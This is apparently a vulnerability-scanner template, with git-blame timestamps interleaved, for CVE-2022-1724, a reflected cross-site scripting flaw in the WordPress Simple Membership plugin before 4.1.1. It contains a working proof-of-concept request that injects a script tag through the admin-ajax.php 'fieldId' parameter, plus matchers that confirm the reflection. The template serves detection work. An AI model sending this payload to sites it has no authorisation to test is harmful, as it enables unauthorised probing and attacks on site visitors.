2022-06-23 18:14:17 +00:00
id : CVE-2022-1724
info :
2022-09-16 19:50:10 +00:00
name : WordPress Simple Membership <4.1.1 - Cross-Site Scripting
2022-06-23 18:14:17 +00:00
author : Akincibor
2022-09-16 20:03:07 +00:00
severity : medium
2022-09-16 19:50:10 +00:00
description : WordPress Simple Membership plugin before 4.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape parameters before outputting them back in AJAX actions.
2022-06-23 18:14:17 +00:00
reference :
- https://wpscan.com/vulnerability/96a0a667-9c4b-4ea6-b78a-0681e9a9bbae
- https://nvd.nist.gov/vuln/detail/CVE-2022-1724
2022-06-23 18:35:18 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2022-1724
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2022-06-23 18:19:41 +00:00
metadata :
2022-06-23 18:35:18 +00:00
verified : "true"
2022-08-27 04:41:18 +00:00
tags : xss,wp,wordpress,wpscan,cve,cve2022,wp-plugin
2022-06-23 18:14:17 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"<script>alert(document.domain)</script>",'
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-09-16 19:50:10 +00:00
# Enhanced by mp on 2022/09/14